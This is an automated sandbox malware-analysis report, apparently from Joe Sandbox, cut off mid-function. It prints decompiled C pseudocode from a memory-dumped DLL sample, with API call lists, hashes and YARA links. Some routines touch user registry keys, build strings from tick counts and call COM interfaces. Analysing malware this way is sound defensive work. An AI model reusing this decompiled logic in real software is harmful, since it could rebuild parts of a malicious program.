StrTrimA.KERNELBASE(?,007DC2A4,00000002,?,007D59CF,?,007D4106,033B95AC,?,007D59CF), ref: 007D9A8D
StrChrA.SHLWAPI(?,00000020,?,007D59CF,?,007D4106,033B95AC,?,007D59CF), ref: 007D9A98
StrTrimA.SHLWAPI(00000001,007DC2A4,?,007D59CF,?,007D4106,033B95AC,?,007D59CF), ref: 007D9AAA

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: ac175bf13578b4265c80d6079f9bf9e1443ad0eac0e595df3c4aab6763ba54f2
Instruction ID: f0effbe15a65b3bd5e5f6bfa029983339ae8cd666ad2c30e11737111c9f5a8cf
Opcode Fuzzy Hash: ac175bf13578b4265c80d6079f9bf9e1443ad0eac0e595df3c4aab6763ba54f2
Instruction Fuzzy Hash: AC0192726053266FC2319E658C49A2BBBBCFB95BA0F26551AF981D7340DA69CC01C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 007D3B20, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D3B20(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E007D473F(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t24 + 0x7dede0; // 0x33b9388
				_t5 = _t24 + 0x7ded88; // 0x4f0053
				_t26 = E007DA3A7( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x7dd27c; // 0x2bda5a8
						_t11 = _t32 + 0x7dedd4; // 0x33b937c
						_t48 = _t11;
						_t12 = _t32 + 0x7ded88; // 0x4f0053
						_t55 = E007D737F(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x7dd27c; // 0x2bda5a8
							_t13 = _t35 + 0x7dee1e; // 0x30314549
							if(E007D728F(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x7dd25c - 6;
								if( *0x7dd25c <= 6) {
									_t42 =  *0x7dd27c; // 0x2bda5a8
									_t15 = _t42 + 0x7dec2a; // 0x52384549
									E007D728F(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x7dd27c; // 0x2bda5a8
							_t17 = _t38 + 0x7dee18; // 0x33b93c0
							_t18 = _t38 + 0x7dedf0; // 0x680043
							_t45 = E007D70E0(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x7dd238, 0, _t55);
						}
					}
					HeapFree( *0x7dd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E007DA50C(_t54);
				}
				return _t45;
			}

0x007d3b20
0x007d3b30
0x007d3b33
0x007d3b3a
0x007d3b3c
0x007d3b3c
0x007d3b3f
0x007d3b44
0x007d3b4b
0x007d3b58
0x007d3b5d
0x007d3b61
0x007d3b6f
0x007d3b7d
0x007d3b81
0x007d3c12
0x007d3c12
0x007d3b87
0x007d3b87
0x007d3b8c
0x007d3b8c
0x007d3b93
0x007d3b9f
0x007d3ba1
0x007d3ba3
0x007d3ba5
0x007d3bac
0x007d3bbe
0x007d3bc0
0x007d3bc7
0x007d3bc9
0x007d3bd0
0x007d3bdb
0x007d3bdb
0x007d3bc7
0x007d3be0
0x007d3be5
0x007d3bec
0x007d3c0a
0x007d3c0c
0x007d3c0c
0x007d3ba3
0x007d3c1e
0x007d3c1e
0x007d3c20
0x007d3c25
0x007d3c27
0x007d3c27
0x007d3c32

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033B9388,00000000,?,73BCF710,00000000,73BCF730), ref: 007D3B6F
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033B93C0,?,00000000,30314549,00000014,004F0053,033B937C), ref: 007D3C0C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007D9F20), ref: 007D3C1E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5e3f1ffd3108063f0a67d58e473b43f0b4e4b09af382a39ceba63dbfda07d984
Instruction ID: 97545abf77e7673687e8c94a3ba782953291f3c76cbe32b84fc12b5505bca86c
Opcode Fuzzy Hash: 5e3f1ffd3108063f0a67d58e473b43f0b4e4b09af382a39ceba63dbfda07d984
Instruction Fuzzy Hash: A3318171901118FFDB21EBA0DC85EAA7BBDFB44340F144197B504AB2A1E778AE44DB64

Uniqueness

Uniqueness Score: -1.00%

Function 007D4BEF, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E007D4BEF(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t37 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x7dd340; // 0x33b9988
				_push(0x800);
				_push(0);
				_push( *0x7dd238);
				if( *0x7dd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x7dd24c =  *0x7dd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E007D168D(_t44, _t40); // executed
						_t18 = E007D6F0D(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x7dd24c < 5) {
								 *0x7dd24c =  *0x7dd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E007D48E8();
						RtlFreeHeap( *0x7dd238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E007D96CE(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E007D11FA(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x007d4bef
0x007d4bef
0x007d4bf2
0x007d4bf3
0x007d4bfd
0x007d4c04
0x007d4c09
0x007d4c0b
0x007d4c11
0x007d4c39
0x007d4c51
0x007d4c53
0x007d4c54
0x007d4c56
0x007d4c94
0x007d4c94
0x007d4c9a
0x007d4ca0
0x007d4ca0
0x007d4c58
0x007d4c5e
0x007d4c61
0x007d4c70
0x007d4c72
0x007d4c79
0x007d4cad
0x007d4cb2
0x007d4cb4
0x007d4cb6
0x007d4cb6
0x00000000
0x007d4cb4
0x007d4c7b
0x007d4c80
0x007d4c8e
0x00000000
0x007d4c8e
0x007d4c48
0x007d4c4d
0x007d4c4d
0x00000000
0x007d4c4d
0x007d4c13
0x007d4c1b
0x00000000
0x00000000
0x007d4c2a
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 007D4C13

Part of subcall function 007D11FA: GetTickCount.KERNEL32 ref: 007D120E
Part of subcall function 007D11FA: wsprintfA.USER32 ref: 007D125E
Part of subcall function 007D11FA: wsprintfA.USER32 ref: 007D127B
Part of subcall function 007D11FA: wsprintfA.USER32 ref: 007D12A7
Part of subcall function 007D11FA: HeapFree.KERNEL32(00000000,?), ref: 007D12B9
Part of subcall function 007D11FA: wsprintfA.USER32 ref: 007D12DA
Part of subcall function 007D11FA: HeapFree.KERNEL32(00000000,?), ref: 007D12EA
Part of subcall function 007D11FA: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007D1318
Part of subcall function 007D11FA: GetTickCount.KERNEL32 ref: 007D1329

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 007D4C31
RtlFreeHeap.NTDLL(00000000,00000002,007D9F6B,?,007D9F6B,00000002,?,?,007D5A08,?), ref: 007D4C8E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: e5eea21548ff6e175f9be7de6ea46ec8e9e8fb66889df5b979b66f1080063b7d
Instruction ID: c25d718313bd7d2138ad23b90f77e2cac0a068ddf72d707419fb7d104b5b22b3
Opcode Fuzzy Hash: e5eea21548ff6e175f9be7de6ea46ec8e9e8fb66889df5b979b66f1080063b7d
Instruction Fuzzy Hash: 69217F76212208EBCB119F54DC48E9A37BCFB48305F108027FA0597250EB78ED04DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 007D8930, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E007D8930(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x7dd238, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E007DA880(_t57 - _a4, _a4, _t48);
							_t38 = E007DA880(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E007DA880(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x007d8938
0x007d893d
0x007d893f
0x007d8946
0x007d8958
0x007d8958
0x007d895c
0x007d895e
0x007d8961
0x007d8964
0x007d896d
0x007d8977
0x007d897b
0x007d8980
0x007d8990
0x007d8996
0x007d899a
0x007d89e9
0x007d899c
0x007d899c
0x007d89a5
0x007d89b4
0x007d89b9
0x007d89c6
0x007d89cf
0x007d89da
0x007d89e1
0x007d89e5
0x007d89e5
0x007d899a
0x007d89f0
0x007d89f7

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 007D8964
StrStrA.SHLWAPI(00000000,?), ref: 007D8971
RtlAllocateHeap.NTDLL(00000000,?), ref: 007D8990

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: 5a36258939fdd61e11602c258c969a9cbd1a6fa7406a5c2b7dd13e47569e7610
Instruction ID: fe4c574a1496e3ad1ba396605801e00456801b8af54d3dedae5603bc7da2d9e2
Opcode Fuzzy Hash: 5a36258939fdd61e11602c258c969a9cbd1a6fa7406a5c2b7dd13e47569e7610
Instruction Fuzzy Hash: BA215136600149AFCB128F68C884BAEBFB5EF84314F048256FC44AB315CB34E915CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 007D3D90, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E007D3D90(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E007DA552(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x7dd27c; // 0x2bda5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x7de4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x7de90c; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E007D80DF();
					_push( &_v64);
					if( *0x7dd0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E007D80DF();
				}
				return _t28;
			}

0x007d3d90
0x007d3d97
0x007d3da0
0x007d3da5
0x007d3da9
0x007d3db3
0x007d3db8
0x007d3dbd
0x007d3dc5
0x007d3dcc
0x007d3dd6
0x007d3dd6
0x007d3dce
0x007d3dce
0x007d3dce
0x007d3dce
0x007d3ddc
0x007d3de2
0x007d3de3
0x007d3de6
0x007d3de9
0x007d3dec
0x007d3df4
0x007d3dfd
0x007d3e05
0x007d3e05
0x007d3e07
0x007d3e09
0x007d3e09
0x007d3e13

APIs

Part of subcall function 007DA552: SysAllocString.OLEAUT32(00000000), ref: 007DA5AE
Part of subcall function 007DA552: SysAllocString.OLEAUT32(0070006F), ref: 007DA5C2
Part of subcall function 007DA552: SysAllocString.OLEAUT32(00000000), ref: 007DA5D4
Part of subcall function 007DA552: SysFreeString.OLEAUT32(00000000), ref: 007DA638

memset.NTDLL ref: 007D3DB3
GetLastError.KERNEL32 ref: 007D3DFF

Strings

<, xrefs: 007D3DC5

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$Alloc$ErrorFreeLastmemset
String ID: <
API String ID: 1330562889-4251816714
Opcode ID: 74f518148f247526acf4da569b16f6973429e78aaf0a7078a1735b442c23e095
Instruction ID: 1a6104af518ed829e3d9dacb704590053caf5fa6f188e06efcfa904ffa815329
Opcode Fuzzy Hash: 74f518148f247526acf4da569b16f6973429e78aaf0a7078a1735b442c23e095
Instruction Fuzzy Hash: 3F014871901218ABDB11EFA9DC85EDE7BB8BB08740F448117F904EB251E778D9048B92

Uniqueness

Uniqueness Score: -1.00%

Function 007D49F5, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E007D49F5(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x7dd27c; // 0x2bda5a8
				_t5 = _t40 + 0x7dee40; // 0x410025
				_t85 = E007D1649(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E007D6EF8(_v16);
					goto L24;
				}
				if(E007D473F(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E007D4FD8(0,  *0x7dd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x7dd27c; // 0x2bda5a8
					_t11 = _t52 + 0x7de81a; // 0x65696c43
					_t55 = E007D4FD8(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E007D82C4(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E007D6EF8(_t87);
					}
					if(_t80 != 0) {
						L17:
						E007D6EF8(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E007DA50C(_t86);
						}
						goto L22;
					} else {
						if(( *0x7dd260 & 0x00000001) == 0) {
							L14:
							E007D5AB6(_v84, _v88, _v88,  *0x7dd270, 0);
							_t80 = E007D428C(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E007D7BD6( &_v40, 0);
							}
							E007D6EF8(_v88);
							goto L17;
						}
						_t67 =  *0x7dd27c; // 0x2bda5a8
						_t18 = _t67 + 0x7de823; // 0x65696c43
						_t70 = E007D4FD8(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E007D82C4(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E007D6EF8(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x007d4a07
0x007d4a0a
0x007d4a11
0x007d4a17
0x007d4a18
0x007d4a19
0x007d4a1a
0x007d4a1b
0x007d4a1c
0x007d4a24
0x007d4a30
0x007d4a34
0x007d4a37
0x007d4b86
0x007d4b89
0x007d4b8d
0x007d4b8d
0x007d4a49
0x007d4a51
0x007d4b79
0x007d4b7a
0x007d4b7d
0x00000000
0x007d4b7d
0x007d4a63
0x007d4a65
0x007d4a65
0x007d4a70
0x007d4a77
0x007d4a7a
0x007d4b68
0x00000000
0x007d4a80
0x007d4a80
0x007d4a85
0x007d4a8e
0x007d4a93
0x007d4a9c
0x007d4abf
0x007d4a9e
0x007d4ab4
0x007d4ab6
0x007d4ab6
0x007d4ac2
0x007d4b5c
0x007d4b5f
0x007d4b69
0x007d4b69
0x007d4b6e
0x007d4b70
0x007d4b70
0x00000000
0x007d4ac8
0x007d4acf
0x007d4b10
0x007d4b20
0x007d4b36
0x007d4b3a
0x007d4b3f
0x007d4b45
0x007d4b52
0x007d4b52
0x007d4b57
0x00000000
0x007d4b57
0x007d4ad1
0x007d4ad6
0x007d4adf
0x007d4ae4
0x007d4ae8
0x007d4b0b
0x007d4aea
0x007d4b00
0x007d4b02
0x007d4b02
0x007d4b0e
0x00000000
0x00000000
0x00000000
0x00000000
0x007d4b0e
0x007d4ac2

APIs

memset.NTDLL ref: 007D4A0A

Part of subcall function 007D1649: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,007D4A30,00410025,00000005,?,00000000), ref: 007D165A
Part of subcall function 007D1649: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 007D1677

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 007D4A3E
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 007D4A49

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: bb570d947ae4ef35c1fe0c4ca2872f7cdefd9491707a65117be339df7a289032
Instruction ID: e32e0f179ffc835080a80a55ef0271d615b423cb37446573e5a242195c47c0d2
Opcode Fuzzy Hash: bb570d947ae4ef35c1fe0c4ca2872f7cdefd9491707a65117be339df7a289032
Instruction Fuzzy Hash: 72414EB2941218BBDB11EFE4CC89EEE7BBCBF08340B144127B541EB251D679DD448B90

Uniqueness

Uniqueness Score: -1.00%

Function 007D813D, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D813D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E007D3727(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x7dd2d4, 0x90);
					_t27 =  *0x7dd2d8; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E007D5AB6(0x90, _a4, _a4, _t27, 0);
					}
					if(E007D93F3( &_v36) != 0 && E007D51AA(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E007D924D(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875fc
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E007D6EF8(_t55);
					}
					memset(_a4, 0, _t53);
					E007D6EF8(_a4);
				}
				return _v16;
			}

0x007d8143
0x007d8148
0x007d8155
0x007d8158
0x007d815b
0x007d8162
0x007d8165
0x007d8173
0x007d8178
0x007d817d
0x007d8182
0x007d8184
0x007d818d
0x007d818d
0x007d819c
0x007d81bf
0x007d81c5
0x007d81cb
0x007d81d3
0x007d81d9
0x007d81dc
0x007d81e9
0x007d81ee
0x007d81f2
0x007d81f2
0x007d81fd
0x007d8208
0x007d8208
0x007d8214

APIs

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

memcpy.NTDLL(00000000,00000090,00000002,00000002,007D9F6B,00000008,007D9F6B,007D9F6B,?,007D4C77,007D9F6B), ref: 007D8173
memset.NTDLL ref: 007D81E9
memset.NTDLL ref: 007D81FD

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 933e8413618171421d47bb1a90af2c6fea19e41304fda86a1d7206742abb377f
Instruction ID: 28a65304bfa2dcfc43c0211966604866ebfc6fb86e3324e7bc79a36083c27415
Opcode Fuzzy Hash: 933e8413618171421d47bb1a90af2c6fea19e41304fda86a1d7206742abb377f
Instruction Fuzzy Hash: 4D215376900518ABDB11AF55CC45FEEBBB8BF48340F048016F914E6351EB38EA01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 007D5298, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E007D5298(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t49 + 0x7de450; // 0x33b89f8
				_t5 = _t49 + 0x7de440; // 0x9ba05972
				_t51 =  *0x7dd15c(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x7dd27c; // 0x2bda5a8
						_t30 = _t56 + 0x7de430; // 0x33b89d8
						_t31 = _t56 + 0x7de460; // 0x4c96be40
						_t58 =  *0x7dd0f8(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x7dd27c; // 0x2bda5a8
											_t23 = _t76 + 0x7de430; // 0x33b89d8
											_t24 = _t76 + 0x7de460; // 0x4c96be40
											_t105 =  *0x7dd0f8(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x7dd27c; // 0x2bda5a8
													_t67 = _v28;
													_t40 = _t99 + 0x7de420; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x007d52a3
0x007d52a5
0x007d52ac
0x007d52ad
0x007d52ae
0x007d52af
0x007d52b5
0x007d52ba
0x007d52c4
0x007d52cb
0x007d52d1
